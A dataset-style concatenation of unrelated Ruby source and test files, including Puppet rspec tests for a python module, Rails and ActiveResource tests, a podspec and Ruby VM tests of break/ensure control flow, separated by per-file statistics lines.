it { is_expected.to contain_file('/opt/env1') }
it { is_expected.to contain_file('/opt/env2') }
end
end
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { pip: 'present', provider: 'pip' } }
it { is_expected.to contain_package('pip').with('provider' => 'pip') }
end
# python::provider
context 'default' do
let(:params) { { provider: '' } }
it { is_expected.to contain_package('pip') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'default/empty' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'EPEL does not exist for Debian' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'RedHat'
case facts[:os]['name']
when 'Fedora'
# written for Fedora 22
context 'on a Fedora OS' do
describe 'EPEL does not exist for Fedora' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'RedHat', 'CentOS'
case facts[:os]['release']['major']
when '7'
context 'on a Redhat 7 OS' do
it { is_expected.to contain_class('python::install') }
it { is_expected.to contain_package('pip').with_name('python2-pip') }
describe 'with python::version' do
context 'python36' do
let(:params) { { version: 'python36' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('pip').with_name('python36-pip') }
it { is_expected.to contain_package('python').with_name('python36') }
it { is_expected.to contain_package('python-dev').with_name('python36-devel') }
end
end
describe 'with python::provider' do
context 'scl' do
describe 'with version' do
context '3.6 SCL meta package' do
let(:params) { { version: 'rh-python36' } }
it { is_expected.to compile.with_all_deps }
end
context '3.6 SCL python package' do
let(:params) { { version: 'rh-python36-python' } }
it { is_expected.to compile.with_all_deps }
end
end
describe 'with manage_scl' do
context 'true' do
let(:params) { { provider: 'scl', manage_scl: true } }
it { is_expected.to contain_package('centos-release-scl') }
it { is_expected.to contain_package('scl-utils') }
end
context 'false' do
let(:params) { { provider: 'scl', manage_scl: false } }
it { is_expected.not_to contain_package('centos-release-scl') }
it { is_expected.not_to contain_package('scl-utils') }
end
end
end
end
end
end
end
when 'Suse'
# written for SLES 11 SP3
context 'on a SLES 11 SP3' do
it { is_expected.to contain_class('python::install') }
# Base Suse packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('python-dev').with_name('python3-devel') }
it { is_expected.to contain_package('python-dev').with_alias('python3-devel') }
it { is_expected.to contain_package('pip') }
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'empty/default' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { provider: 'pip' } }
it {
is_expected.to contain_package('pip').with(
'provider' => 'pip'
)
}
end
# python::provider
context 'default' do
let(:params) { { provider: '' } }
it { is_expected.to contain_package('pip') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'default/empty' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'EPEL does not exist on Suse' do
context 'default/empty' do
it { is_expected.not_to contain_class('epel') }
end
end
end
when 'Gentoo'
context 'on a Gentoo OS' do
it { is_expected.to contain_class('python::install') }
# Base debian packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('pip').with('category' => 'dev-python') }
# Python::Dev
it { is_expected.not_to contain_package('python-dev') }
describe 'with manage_gunicorn' do
context 'true' do
let(:params) { { manage_gunicorn: true } }
it { is_expected.to contain_package('gunicorn') }
end
context 'empty args' do
# let(:params) {{ :manage_gunicorn => '' }}
it { is_expected.to contain_package('gunicorn') }
end
context 'false' do
let(:params) { { manage_gunicorn: false } }
it { is_expected.not_to contain_package('gunicorn') }
end
end
describe 'with python::provider' do
context 'pip' do
let(:params) { { pip: 'present', provider: 'pip' } }
it { is_expected.to contain_package('pip').with('provider' => 'pip') }
end
end
end
end
end
end
end
| 35.018405 | 97 | 0.507708 |
38d135d9f386689c1bbbd10af8db4e4573e4f3cf | 1,895 | module PageSerializer
class SearchPage < PageSerializer::BasePageSerializer
# Initialise a Search index page serializer.
#
# @param [ActionDispatch::Request] request the current request object.
# @param [String] opensearch_description_url a description url for the search.
# @param [String] query a query string used for the search.
# @param [Array<Object>] results an array of objects used for displaying results.
# @param [Hash] pagination_hash a hash containing data used for pagination.
# @param [String] flash_message a translation block that is evaluated into a flash message.
def initialize(request: nil, opensearch_description_url: nil, query: nil, results: nil, pagination_hash: nil, flash_message: nil)
@opensearch_description_url = opensearch_description_url
@query = query
@results = results
@pagination_helper = PaginationHelper.new(pagination_hash) if pagination_hash
@flash_message = flash_message
super(request: request, data_alternates: nil)
end
private
attr_reader :opensearch_description_url
def content
raise StandardError, 'You must implement #content'
end
def section_primary_components(heading_content, context_content = nil, context_hidden = nil)
[].tap do |content|
content << ComponentSerializer::Heading1ComponentSerializer.new(heading: heading_content, context: context_content, context_hidden: context_hidden).to_h
content << ComponentSerializer::SearchFormComponentSerializer.new(query: @query, components: [ComponentSerializer::SearchIconComponentSerializer.new.to_h]).to_h
end
end
def total_results
@results&.totalResults.to_i
end
# Overrides the default of true (found in the base page serializer) for including global search in the header.
def include_global_search
false
end
end
end
| 41.195652 | 168 | 0.743536 |
28f1cfc97cb683f0e0240c350161c703482279c4 | 4,323 | require "#{File.dirname(__FILE__)}/../abstract_unit"
require "fixtures/person"
require "fixtures/street_address"
module Highrise
class Note < ActiveResource::Base
self.site = "http://37s.sunrise.i:3000"
end
class Comment < ActiveResource::Base
self.site = "http://37s.sunrise.i:3000"
end
end
class BaseLoadTest < Test::Unit::TestCase
def setup
@matz = { :id => 1, :name => 'Matz' }
@first_address = { :id => 1, :street => '12345 Street' }
@addresses = [@first_address, { :id => 2, :street => '67890 Street' }]
@addresses_from_xml = { :street_addresses => @addresses }
@addresses_from_xml_single = { :street_addresses => [ @first_address ] }
@deep = { :id => 1, :street => {
:id => 1, :state => { :id => 1, :name => 'Oregon',
:notable_rivers => [
{ :id => 1, :name => 'Willamette' },
{ :id => 2, :name => 'Columbia', :rafted_by => @matz }] }}}
@person = Person.new
end
def test_load_expects_hash
assert_raise(ArgumentError) { @person.load nil }
assert_raise(ArgumentError) { @person.load '<person id="1"/>' }
end
def test_load_simple_hash
assert_equal Hash.new, @person.attributes
assert_equal @matz.stringify_keys, @person.load(@matz).attributes
end
def test_load_one_with_existing_resource
address = @person.load(:street_address => @first_address).street_address
assert_kind_of StreetAddress, address
assert_equal @first_address.stringify_keys, address.attributes
end
def test_load_one_with_unknown_resource
address = silence_warnings { @person.load(:address => @first_address).address }
assert_kind_of Person::Address, address
assert_equal @first_address.stringify_keys, address.attributes
end
def test_load_collection_with_existing_resource
addresses = @person.load(@addresses_from_xml).street_addresses
assert_kind_of Array, addresses
addresses.each { |address| assert_kind_of StreetAddress, address }
assert_equal @addresses.map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_unknown_resource
Person.send(:remove_const, :Address) if Person.const_defined?(:Address)
assert !Person.const_defined?(:Address), "Address shouldn't exist until autocreated"
addresses = silence_warnings { @person.load(:addresses => @addresses).addresses }
assert Person.const_defined?(:Address), "Address should have been autocreated"
addresses.each { |address| assert_kind_of Person::Address, address }
assert_equal @addresses.map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_single_existing_resource
addresses = @person.load(@addresses_from_xml_single).street_addresses
assert_kind_of Array, addresses
addresses.each { |address| assert_kind_of StreetAddress, address }
assert_equal [ @first_address ].map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_single_unknown_resource
Person.send(:remove_const, :Address) if Person.const_defined?(:Address)
assert !Person.const_defined?(:Address), "Address shouldn't exist until autocreated"
addresses = silence_warnings { @person.load(:addresses => [ @first_address ]).addresses }
assert Person.const_defined?(:Address), "Address should have been autocreated"
addresses.each { |address| assert_kind_of Person::Address, address }
assert_equal [ @first_address ].map(&:stringify_keys), addresses.map(&:attributes)
end
def test_recursively_loaded_collections
person = @person.load(@deep)
assert_equal @deep[:id], person.id
street = person.street
assert_kind_of Person::Street, street
assert_equal @deep[:street][:id], street.id
state = street.state
assert_kind_of Person::Street::State, state
assert_equal @deep[:street][:state][:id], state.id
rivers = state.notable_rivers
assert_kind_of Array, rivers
assert_kind_of Person::Street::State::NotableRiver, rivers.first
assert_equal @deep[:street][:state][:notable_rivers].first[:id], rivers.first.id
assert_equal @matz[:id], rivers.last.rafted_by.id
end
def test_nested_collections_within_the_same_namespace
n = Highrise::Note.new(:comments => [{ :name => "1" }])
assert_kind_of Highrise::Comment, n.comments.first
end
end | 38.945946 | 93 | 0.718714 |
d57e14496097360d12d819418db9706c17261875 | 5,002 | =begin
#Selling Partner APIs for Fulfillment Outbound
#The Selling Partner API for Fulfillment Outbound lets you create applications that help a seller fulfill Multi-Channel Fulfillment orders using their inventory in Amazon's fulfillment network. You can get information on both potential and existing fulfillment orders.
OpenAPI spec version: 2020-07-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
# load the gem
require 'fulfillment-outbound-api-model'
# The following was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 44.660714 | 268 | 0.748501 |
abf835860776b8aef817ebda9fa42aeee0a50176 | 154 | class VisitSerializer < ActiveModel::Serializer
attributes :id, :city_rating, :avatar, :user_id, :avatar_url
belongs_to :user
belongs_to :city
end
| 22 | 62 | 0.766234 |
bf025a4c3c093b293785d526e6ece1a3b668a19f | 1,590 | require "rails_helper"
describe CompositeRatingTierFactorSet do
let(:validation_errors) {
subject.valid?
subject.errors
}
it "requires a carrier profile" do
expect(validation_errors.has_key?(:carrier_profile_id)).to be_truthy
end
it "requires a default factor value" do
expect(validation_errors.has_key?(:default_factor_value)).to be_truthy
end
it "requires an active year" do
expect(validation_errors.has_key?(:active_year)).to be_truthy
end
end
describe CompositeRatingTierFactorSet, "given
- a carrier profile
- an active year
- a default factor value
- no rating factor entries
" do
let(:default_factor_value) { 1.234567 }
let(:carrier_profile_id) { BSON::ObjectId.new }
let(:active_year) { 2015 }
subject do
CompositeRatingTierFactorSet.new({
:default_factor_value => default_factor_value,
:active_year => active_year,
:carrier_profile_id => carrier_profile_id
})
end
it "is valid" do
expect(subject.valid?).to be_truthy
end
it "returns the default factor on all lookups" do
expect(subject.lookup(:bdklajdlfs)).to eq default_factor_value
end
end
describe CompositeRatingTierFactorSet, "given
- a rating factor entry with key 'abc' and value '1.345'
" do
subject do
CompositeRatingTierFactorSet.new({
:rating_factor_entries => [
RatingFactorEntry.new({
:factor_key => 'abc',
:factor_value => 1.345
})
]
})
end
it "returns the '1.345' for a lookup of 'abc'" do
expect(subject.lookup('abc')).to eq 1.345
end
end
| 22.394366 | 76 | 0.697484 |
f7c3cf748f9a33d386ae56a3dd2f69358be76a46 | 1,094 | # frozen_string_literal: true
module EE
module Sidebars
module Projects
module Panel
extend ::Gitlab::Utils::Override
override :configure_menus
def configure_menus
super
insert_menu_before(::Sidebars::Projects::Menus::ProjectInformationMenu,
::Sidebars::Projects::Menus::TrialExperimentMenu.new(context))
if ::Sidebars::Projects::Menus::IssuesMenu.new(context).show_jira_menu_items?
remove_menu(::Sidebars::Projects::Menus::ExternalIssueTrackerMenu)
end
add_billing_sidebar_menu
end
private
def add_billing_sidebar_menu
experiment(:billing_in_side_nav, actor: context.current_user, namespace: context.project.namespace.root_ancestor, sticky_to: context.current_user) do |e|
e.control {}
e.candidate do
insert_menu_after(::Sidebars::Projects::Menus::SettingsMenu, ::Sidebars::Projects::Menus::BillingMenu.new(context))
end
end
end
end
end
end
end
| 29.567568 | 163 | 0.63894 |
ffdc8b0c67f4b70e72caab64b338e5b138aaa297 | 411 | class EventTranslation < ActiveRecord::Base
attr_accessible :event_id, :name, :locale, :name_abbrv, :description
belongs_to :event
validates :name, :locale, :presence => true
# this will always call validation to fail due to the translations being
# created while the event is created. probably way to fix
# validates :event_id, :presence => true
default_scope order('locale ASC, name ASC')
end
| 34.25 | 74 | 0.746959 |
d5a909625b9c6bf2ab4ed26395974357f7dccac3 | 774 | Pod::Spec.new do |s|
s.name = 'TOCropViewController'
s.version = '2.5.5'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'A view controller that enables cropping and rotation of UIImage objects.'
s.homepage = 'https://github.com/TimOliver/TOCropViewController'
s.author = 'Tim Oliver'
s.source = { :git => 'https://github.com/TimOliver/TOCropViewController.git', :tag => s.version }
s.platform = :ios, '8.0'
s.source_files = 'Objective-C/TOCropViewController/**/*.{h,m}'
s.exclude_files = 'Objective-C/TOCropViewController/include/**/*.h'
s.resource_bundles = {
'TOCropViewControllerBundle' => ['Objective-C/TOCropViewController/**/*.lproj','Objective-C/TOCropViewController/**/*.bundle']
}
s.requires_arc = true
end
| 45.529412 | 130 | 0.677003 |
5d9f09ff89f4994502a60f2216fc8fdd21edf3a2 | 43 | # typed: true
def bar; end;
/foo#{bar}baz/
| 10.75 | 14 | 0.627907 |
385d01007d2288b5d6f5111ad13f391bc21a0b84 | 960 | # frozen_string_literal: true
require 'test_helper'
module Users
class OperatorTest < ActiveSupport::TestCase
test 'creation works' do
operator = create(:operator)
user_operator = Users::Operator.create(first_name: 'Martin',
last_name: 'Fourcade',
email: '[email protected]',
password: 'okokok',
operator_id: operator.id,
accept_terms: true)
assert_equal operator, user_operator.operator
assert_not_nil user_operator.api_token
end
test 'association.internship_offers' do
operator = create(:user_operator)
internship_offer = create(:weekly_internship_offer, employer: operator)
operator.reload
assert_equal internship_offer, operator.internship_offers.first
end
end
end
| 35.555556 | 77 | 0.569792 |
0390062a2435cc3a2200e3b6c3f471de083ffd8c | 13,012 | assert_equal %q{[1, 2, 4, 5, 6, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each{; $a << 2
break; $a << 3
}; $a << 4
begin; $a << 5
ensure; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 6, 7, 8]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
[1,2].each do; $a << 3
break; $a << 4
end; $a << 5
ensure; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{ok}, %q{
["a"].inject("ng"){|x,y|
break :ok
}
}
assert_equal %q{ok}, %q{
unless ''.respond_to? :lines
class String
def lines
self
end
end
end
('a').lines.map{|e|
break :ok
}
}
assert_equal %q{[1, 2, 4, 5]}, %q{$a = []; begin; ; $a << 1
["a"].inject("ng"){|x,y|; $a << 2
break :ok; $a << 3
}; $a << 4
; $a << 5
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 4, 5]}, %q{$a = []; begin; ; $a << 1
('a'..'b').map{|e|; $a << 2
break :ok; $a << 3
}; $a << 4
; $a << 5
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
end; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 9, 10]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
ensure; $a << 6
break; $a << 7
end; $a << 8
end; $a << 9
; $a << 10
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 7, 10, 11]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
raise; $a << 6
ensure; $a << 7
break; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 7, 10, 11]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
raise; $a << 6
rescue; $a << 7
break; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
raise StandardError; $a << 4
ensure; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
raise StandardError; $a << 4
rescue; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 6, 8, 10, 11]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
begin; $a << 4
break; $a << 5
ensure; $a << 6
end; $a << 7
ensure; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 14, 15]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
begin; $a << 8
raise; $a << 9
rescue; $a << 10
break; $a << 11
end; $a << 12
end; $a << 13
end; $a << 14
; $a << 15
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 16, 17]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
1.times{; $a << 8
begin; $a << 9
raise; $a << 10
rescue; $a << 11
break; $a << 12
end; $a << 13
}; $a << 14
end; $a << 15
end; $a << 16
; $a << 17
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 14, 15]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
begin; $a << 8
raise; $a << 9
ensure; $a << 10
break; $a << 11
end; $a << 12
end; $a << 13
end; $a << 14
; $a << 15
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 16, 17]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
1.times{; $a << 8
begin; $a << 9
raise; $a << 10
ensure; $a << 11
break; $a << 12
end; $a << 13
}; $a << 14
end; $a << 15
end; $a << 16
; $a << 17
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 99]}, %q{
$a = [];
begin; ; $a << 1
while true; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
raise; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 6, 8, 9, 10, 11]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
[1,2].each do; $a << 3
begin; $a << 4
break; $a << 5
ensure; $a << 6
end; $a << 7
end; $a << 8
ensure; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 4, 99]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
raise StandardError; $a << 3
ensure; $a << 4
end; $a << 5
; $a << 6
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
ensure; $a << 3
end ; $a << 4
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 99]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
raise StandardError; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{3}, %q{
def m a, b
a + b
end
m(1,
while true
break 2
end
)
}
assert_equal %q{4}, %q{
def m a, b
a + b
end
m(1,
(i=0; while i<2
i+=1
class C
next 2
end
end; 3)
)
}
assert_equal %q{34}, %q{
def m a, b
a+b
end
m(1, 1.times{break 3}) +
m(10, (1.times{next 3}; 20))
}
assert_equal %q{[1, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
break; $a << 4
end; $a << 5
}; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class A; $a << 3
class B; $a << 4
break; $a << 5
end; $a << 6
end; $a << 7
}; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 2, 3, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
next; $a << 4
end; $a << 5
}; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 2, 3, 4, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
class D; $a << 4
next; $a << 5
end; $a << 6
end; $a << 7
}; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
class C; $a << 3
break; $a << 4
end; $a << 5
end; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
class C; $a << 3
class D; $a << 4
break; $a << 5
end; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 3, 4, 5, 3, 4, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
class C; $a << 5
next 10; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{1}, %q{
1.times{
while true
class C
begin
break
ensure
break
end
end
end
}
}
assert_equal %q{[1, 2, 3, 5, 2, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
next; $a << 4
ensure; $a << 5
end; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 6, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
o = "test"; $a << 2
def o.test(a); $a << 3
return a; $a << 4
ensure; $a << 5
end; $a << 6
o.test(123); $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 4, 7, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
def m1 *args; $a << 2
; $a << 3
end; $a << 4
def m2; $a << 5
m1(:a, :b, (return 1; :c)); $a << 6
end; $a << 7
m2; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 8, 2, 3, 4, 5, 9, 10]}, %q{$a = []; begin; ; $a << 1
def m(); $a << 2
begin; $a << 3
2; $a << 4
ensure; $a << 5
return 3; $a << 6
end; $a << 7
end; $a << 8
m; $a << 9
; $a << 10
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 3, 11, 4, 5, 6, 7, 12, 13]}, %q{$a = []; begin; ; $a << 1
def m2; $a << 2
end; $a << 3
def m(); $a << 4
m2(begin; $a << 5
2; $a << 6
ensure; $a << 7
return 3; $a << 8
end); $a << 9
4; $a << 10
end; $a << 11
m(); $a << 12
; $a << 13
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 16, 2, 3, 4, 5, 6, 7, 10, 11, 17, 18]}, %q{$a = []; begin; ; $a << 1
def m; $a << 2
1; $a << 3
1.times{; $a << 4
2; $a << 5
begin; $a << 6
3; $a << 7
return; $a << 8
4; $a << 9
ensure; $a << 10
5; $a << 11
end; $a << 12
6; $a << 13
}; $a << 14
7; $a << 15
end; $a << 16
m(); $a << 17
; $a << 18
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
i+=1
begin
begin
next
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
i+=1
begin
begin
break
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
if i>0
break
end
i+=1
begin
begin
redo
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %Q{ENSURE\n}, %q{
